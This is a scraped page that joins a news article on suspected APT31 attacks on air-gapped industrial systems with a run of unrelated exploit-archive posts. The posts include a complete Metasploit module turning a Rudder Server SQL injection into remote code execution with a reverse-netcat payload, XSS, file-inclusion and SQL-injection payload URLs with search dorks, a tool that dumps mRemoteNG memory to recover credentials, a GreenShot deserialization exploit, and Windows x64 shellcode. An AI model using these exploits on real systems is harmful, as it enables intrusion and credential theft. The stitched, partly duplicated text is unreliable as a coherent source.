A nation-state actor with links to China is suspected of being behind a series of attacks against industrial organizations in Eastern Europe that took place last year to siphon data stored on air-gapped systems.
Cybersecurity company Kaspersky attributed the intrusions with medium to high confidence to a hacking crew called APT31, which is also tracked under the monikers Bronze Vinewood,

A nation-state actor with links to China is suspected of being behind a series of attacks against industrial organizations in Eastern Europe that took place last year to siphon data stored on air-gapped systems.

Cybersecurity company Kaspersky attributed the intrusions with medium to high confidence to a hacking crew called **APT31**, which is also tracked under the monikers Bronze Vinewood, Judgement Panda and Violet Typhoon (formerly Zirconium), citing commonalities in the tactics observed.

The attacks entailed the use of more than 15 distinct implants and their variants, broken down into three broad categories based on their ability to establish persistent remote access, gather sensitive information, and transmit the collected data to actor-controlled infrastructure.

"One of the implant types appeared to be a sophisticated modular malware, aimed at profiling removable drives and contaminating them with a worm to exfiltrate data from isolated, or air-gapped, networks of industrial organizations in Eastern Europe," Kaspersky said.

"The other type of implant is designed for stealing data from a local computer and sending it to Dropbox with the help of the next-stage implants."

One set of backdoors includes various versions of a malware family called FourteenHi that have been put to use since at least mid-March 2021 and which come with a broad spectrum of features to upload and download arbitrary files, run commands, start a reverse shell, and erase their own presence from the compromised hosts.

A second first-stage backdoor used for remote access and initial data gathering is MeatBall, which possesses capabilities to list running processes, enumerate connected devices, perform file operations, capture screenshots, and self-update itself.

Also discovered is a third type of first-stage implant that makes use of Yandex Cloud for command-and-control, mirroring similar findings from Positive Technologies in August 2022 detailing APT31 attacks targeting Russian media and energy companies.

"The tendency to abuse cloud services (e.g., Dropbox, Yandex, Google, etc.) is not new, but it continues to expand, because it is hard to restrict / mitigate in cases when an organization's business processes depend on using such services," Kaspersky researchers said.

"Threat actors keep making it more difficult to detect and analyze threats by hiding payloads in encrypted form in separate binary data files and by hiding malicious code in the memory of legitimate applications via DLL hijacking and a chain of memory injections."

APT31 has also been observed utilizing dedicated implants for gathering local files as well as exfiltrating data from air-gapped systems by infecting removable drives.

The latter malware strain consists of at least three modules, with each component responsible for different tasks, such as profiling and handling removable drives, recording keystrokes and screenshots, and planting second-step malware on newly connected drives.

"The threat actor's deliberate efforts to obfuscate their actions through encrypted payloads, memory injections, and DLL hijacking \[underscore\] the sophistication of their tactics," Kirill Kruglov, senior security researcher at Kaspersky ICS CERT, said.

"Although exfiltrating data from air-gapped networks is a recurrent strategy adopted by many APTs and targeted cyberespionage campaigns, this time it has been designed and implemented uniquely by the actor."

While the aforementioned attack chains are expressly engineered for the Windows environment, there is evidence that APT31 has set its sights on Linux systems as well.

Earlier this month, the AhnLab Security Emergency Response Center (ASEC) uncovered attacks likely carried out by the adversary against South Korean companies with the goal of infecting the machines with a backdoor called Rekoobe.

"Rekoobe is a backdoor that can receive commands from a \[command-and-control\] server to perform various features such as downloading malicious files, stealing internal files from a system, and executing reverse shell," ASEC said.

"While it may appear simple in structure, it employs encryption to evade network packet detection and can perform a variety of malicious behaviors through commands from the threat actor."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

China's APT31 Suspected in Attacks on Air-Gapped Systems in Eastern Europe

This Metasploit module exploits a SQL injection vulnerability in RudderStack's rudder-server, an open source Customer Data Platform (CDP). The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1. By exploiting this flaw, an attacker can execute arbitrary SQL commands, which may lead to remote code execution due to the rudder role in PostgreSQL having superuser permissions by default.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Rudder Server SQLI Remote Code Execution',        'Description' => %q{          This Metasploit module exploits a SQL injection vulnerability in          RudderStack's rudder-server, an open source Customer Data Platform (CDP).          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.          By exploiting this flaw, an attacker can execute arbitrary SQL commands,          which may lead to Remote Code Execution (RCE) due to the `rudder` role          in PostgreSQL having superuser permissions by default.        },        'License' => MSF_LICENSE,        'Author' => [          'Ege Balcı <egebalci@pm.me>' # msf module        ],        'References' => [          ['CVE', '2023-30625'],          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],        ],        'DefaultOptions' => {          'SSL' => false,          'WfsDelay' => 5        },        'Platform' => [ 'unix', 'linux' ],        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],        'Targets' => [          [            'Unix Command',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          # Due to the insufficient build instructions for Windows platforms, no testing were done on this platform.          # As a result, the target is disabled in this exploit module.          # [          #   'Windows Command',          #   {          #     'Platform' => 'win',          #     'Arch' => ARCH_CMD,          #     'Type' => :win_cmd,          #     'DefaultOptions' => {          #       'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'          #     }          #   }          # ],        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2023-06-16',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),      ]    )  end  def check    version = get_version    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'    if Rex::Version.new('1.3.0-rc.1') > Rex::Version.new(version.gsub('v', ''))      return Exploit::CheckCode::Appears("Rudder Version: #{version}")    end    Exploit::CheckCode::Safe  end  def get_version    return @get_version if @get_version    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'version')    )    if res && res.code == 200      @get_version = res.get_json_document['Version']      if @get_version.empty?        @get_version = 'Unknown'      end      @get_version    end  end  def exploit    print_status "Detected rudder version: #{get_version}"    # If not 'Auto' then use the selected version    case target['Type']    # when :win_cmd    #   shell = 'cmd.exe'    when :unix_cmd      shell = 'bash'    else      fail_with(Failure::BadConfig, 'Please select a valid target')    end    data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"    print_status 'Triggering RCE via crafted SQL query...'    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'),      'ctype' => 'application/json',      'data' => data    })  endend

Rudder Server SQL Injection / Remote Code Execution

Joomla iProperty Real Estate extension version 4.1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: The Thinkery LLC# Vendor Homepage: http://thethinkery.net# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/# Demo: https://iproperty.thethinkery.net/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /iproperty/property-views/all-properties-with-mapGET parameter 'filter_keyword' is vulnerable to XSShttps://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4[-] Done

Joomla iProperty Real Estate 4.1.1 Cross Site Scripting

Codecanyon Bitcoin Tools Suite version 1.0 suffers from a local file inclusion vulnerability.

    ========================================================================================================| # Title     : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability                                  || # Author    : indoushka                                                                              || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                | | # Vendor    : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html |  | # Dork      : "Powerful bitcoin and cryptocurrency tools & tickers."                                 |========================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : index.php    line 4 : require_once('includes/templates/' . $website['template'] . '/header.php');[+] http://localhost/btcon/index.php?website['template'] = evilGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Codecanyon Bitcoin Tools Suite 1.0 Local File Inclusion

CMVC SHOP LMS version 2.1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMVC SHOP LMS v 2.1.0 Sql injection Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               | | # Vendor    : http://www.cmvcshop.com/                                                                                           |  | # Dork      : All rights reserved CMVC SHOP                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : product_detail.php?productid=%Inject_Here%106[+] http://127.0.0.1/cmvcshopcom/product_detail.php?productid=%Inject_Here%106[+] http://127.0.0.1/wwwcmvcshopcom/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMVC SHOP LMS 2.1.0 SQL Injection

mRemoteNG version 1.77.3.1784-NB exploit that extracts sensitive information that is stored in memory in the clear but encrypted at rest.

    # Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory# Google Dork: -# Date: 21.07.2023# Exploit Author: Maximilian Barz# Vendor Homepage: https://mremoteng.org/# Software Link: https://mremoteng.org/download# Version: mRemoteNG <= v1.77.3.1784-NB# Tested on: Windows 11# CVE : CVE-2023-30367/*Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users tostore and manage multi-protocol connection configurations to remotely connect to systems.mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-devloads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,even if no connection has been established yet. This allows attackers to access contents of configuration files in plain textthrough a memory dump and thus compromise user credentials when no custom password encryption key has been set.This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper*/using System;using System.Collections;using System.Collections.Generic;using System.Diagnostics;using System.IO;using System.Reflection;using System.Runtime.InteropServices;using System.Text;using System.Text.RegularExpressions;namespace mRemoteNGDumper{public static class Program{public enum MINIDUMP_TYPE{MiniDumpWithFullMemory = 0x00000002}[StructLayout(LayoutKind.Sequential, Pack = 4)]public struct MINIDUMP_EXCEPTION_INFORMATION{public uint ThreadId;public IntPtr ExceptionPointers;public int ClientPointers;}[DllImport("kernel32.dll")]static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);[DllImport("Dbghelp.dll")]static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);static void Main(string[] args){string input;bool configfound = false;StringBuilder filesb;StringBuilder linesb;List<string> configs = new List<string>();Process[] localByName = Process.GetProcessesByName("mRemoteNG");if (localByName.Length == 0) {Console.WriteLine("[-] No mRemoteNG process was found. Exiting");System.Environment.Exit(1);}string assemblyPath = Assembly.GetEntryAssembly().Location;Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";FileStream procdumpFileStream = File.Create(dumpFileName);MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();// A full memory dump is necessary in the case of a managed application, other wise no information// regarding the managed code will be availableMINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);procdumpFileStream.Close();filesb = new StringBuilder();Console.WriteLine("[+] Searching for configuration files in memory dump.");using (StreamReader reader = new StreamReader(dumpFileName)){while (reader.Peek() >= 0){input = reader.ReadLine();string pattern = @"(\<Node)(.*)(?=\/>)\/>";Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);if (m.Success){configfound = true;foreach (string config in m.Value.Split('>')){configs.Add(config);}}}reader.Close();if (configfound){string currentDir = System.IO.Directory.GetCurrentDirectory();string dumpdir = currentDir + "/dump";if (!Directory.Exists(dumpdir)){Directory.CreateDirectory(dumpdir);}string savefilepath;for (int i =0; i < configs.Count;i++){if (!string.IsNullOrEmpty(configs[i])){savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);using (StreamWriter writer = new StreamWriter(savefilepath)){writer.Write(configs[i]+'>');writer.Close();}}}Console.WriteLine("[+] Done!");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );}else{Console.WriteLine("[-] No configuration file found in memorydump. Exiting");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);}}}}}

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction

GreenShot version 1.2.10 suffers from an insecure deserialization arbitrary code execution vulnerability.

    # Exploit Title: GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution# Date: 26/07/2023# Exploit Author: p4r4bellum# Vendor Homepage: https://getgreenshot.org# Software Link: https://getgreenshot.org/downloads/# Version: 1.2.6.10# Tested on: windows 10.0.19045 N/A build 19045# CVE : CVE-2023-34634## GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file# will lead to arbitrary code execution## Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net./ysoserial.exe -f BinaryFormatter -g WindowsIdentity  -c "calc" --outputpath payload.bin -o raw#load the payload$payload = Get-Content .\payload.bin -Encoding Byte# retrieve the length of the payload$length = $payload.Length# load the required assembly to craft a PNG fileAdd-Type -AssemblyName System.Drawing# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell$filename = "$home\poc.greenshot"$bmp = new-object System.Drawing.Bitmap 250,61 $font = new-object System.Drawing.Font Consolas,24 $brushBg = [System.Drawing.Brushes]::Green $brushFg = [System.Drawing.Brushes]::Black $graphics = [System.Drawing.Graphics]::FromImage($bmp) $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) $graphics.Dispose() $bmp.Save($filename) # append the payload to the PNG file$payload | Add-Content -Path $filename -Encoding Byte -NoNewline # append the length of the payload[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding  Byte -NoNewline# append the signature"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii# launch greenshot. Calc.exe should be executedInvoke-Item  $filename

GreenShot 1.2.10 Arbitrary Code Execution

CMSshop version 1 suffers from a cross site scripting vulnerability.

**CMSshop 1 Cross Site Scripting**

Posted Jul 31, 2023

Authored by indoushka

CMSshop version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 987e4a7e0d2984ae1bf6c18eb68c0343d8d4d8903869ab00d311e71710917c70

Download | Favorite | View

**CMSshop 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMSshop(ir) v1 XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               || # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22                   /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22            [+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,806)
*   Arbitrary (16,170)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,026)
*   Code Execution (7,254)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,386)
*   Encryption (2,366)
*   Exploit (51,705)
*   File Inclusion (4,218)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (891)
*   Java (3,038)
*   JavaScript (853)
*   Kernel (6,658)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,587)
*   Python (1,531)
*   Remote (30,698)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,879)
*   Shell (3,177)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,329)
*   TCP (2,399)
*   Trojan (687)
*   UDP (886)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,628)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,889)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,301)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,624)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,782)
*   UNIX (9,272)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CMSshop 1 Cross Site Scripting

169 bytes small Windows/x64 PIC NULL-free calc.exec shellcode.

    import ctypes, structfrom keystone import *# Shellcode Author: Senzee# Shellcode Title: Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)# Date: 07/26/2023# Platform: Windows x64# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763# Shellcode size: 169 bytes# Shellcode Desciption: Windows x64 shellcode that dynamically resolves the base address of kernel32.dll via PEB and ExportTable method.# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.CODE = ("find_kernel32:"" xor rdx, rdx;"" mov rax, gs:[rdx+0x60];"    # RAX stores  the value of ProcessEnvironmentBlock member in TEB, which is the PEB address" mov rsi,[rax+0x18];"    # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure" mov rsi,[rsi + 0x20];"    # RSI is the address of the InMemoryOrderModuleList member in the _PEB_LDR_DATA structure" mov r9, [rsi];"    # Current module is python.exe" mov r9, [r9];"    # Current module is ntdll.dll" mov r9, [r9+0x20];"    # Current module is kernel32.dll" jmp call_winexec;""parse_module:" # Parsing DLL file in memory" mov ecx, dword ptr [r9 + 0x3c];" # R9 stores  the base address of the module, get the NT header offset" xor r15, r15;"" mov r15b, 0x88;"    # Offset to Export Directory   " add r15, r9;"" add r15, rcx;"" mov r15d, dword ptr [r15];"    # Get the RVA of the export directory" add r15, r9;"    # R14 stores  the VMA of the export directory" mov ecx, dword ptr [r15 + 0x18];"    # ECX stores  the number of function names as an index value" mov r14d, dword ptr [r15 + 0x20];"    # Get the RVA of ENPT" add r14, r9;"    # R14 stores  the VMA of ENPT"search_function:"    # Search for a given function" jrcxz not_found;"    # If RCX is 0, the given function is not found" dec ecx;"    # Decrease index by 1" xor rsi, rsi;"" mov esi, [r14 + rcx*4];"    # RVA of function name string" add rsi, r9;"    # RSI points to function name string"function_hashing:"    # Hash function name function" xor rax, rax;"" xor rdx, rdx;"" cld;"    # Clear DF flag"iteration:"     # Iterate over each byte" lodsb;"     # Copy the next byte of RSI to Al" test al, al;"     # If reaching the end of the string" jz compare_hash;"     # Compare hash" ror edx, 0x0d;"     # Part of hash algorithm" add edx, eax;"     # Part of hash algorithm" jmp iteration;"     # Next byte"compare_hash:"     # Compare hash" cmp edx, r8d;"" jnz search_function;"     # If not equal, search the previous function (index decreases)" mov r10d, [r15 + 0x24];"     # Ordinal table RVA" add r10, r9;"     # Ordinal table VMA" movzx ecx, word ptr [r10 + 2*rcx];"     # Ordinal value -1" mov r11d, [r15 + 0x1c];"    # RVA of EAT" add r11, r9;"    # VMA of EAT" mov eax, [r11 + 4*rcx];"    # RAX stores  RVA of the function" add rax, r9;"    # RAX stores  VMA of the function" ret;""not_found:"" ret;""call_winexec:""    mov r8d, 0xe8afe98;"     # WinExec Hash"    call parse_module;"     # Search and obtain address of WinExec"    xor rcx, rcx;""    push rcx;"    # \0"    mov rcx, 0x6578652e636c6163;"    # exe.clac "    push rcx;""    lea rcx, [rsp];"    # Address of the string as the 1st argument lpCmdLine"    xor rdx,rdx;""    inc rdx;"    # uCmdShow=1 as the 2nd argument "    sub rsp, 0x28;""    call rax;"     # WinExec)# Payload size: 169 bytes# buf =  b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31"# buf += b"\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2"# buf += b"\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"ks = Ks(KS_ARCH_X86, KS_MODE_64)encoding, count = ks.asm(CODE)print("%d instructions..." % count)sh = b""for e in encoding:    sh += struct.pack("B", e)shellcode = bytearray(sh)sc = ""print("Payload size: "+str(len(encoding))+" bytes")counter = 0sc = "buf =  b\""for dec in encoding:    if counter % 20 == 0 and counter != 0:        sc += "\"\nbuf += b\""    sc += "\\x{0:02x}".format(int(dec))    counter += 1if count % 20 > 0:  sc += "\""  print(sc)print("Payload size: "+str(len(encoding))+" bytes")

Windows/x64 PIC NULL-Free Calc.exec Shellcode

CMSninesol version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMSninesol v1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ninesol.com                                                                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows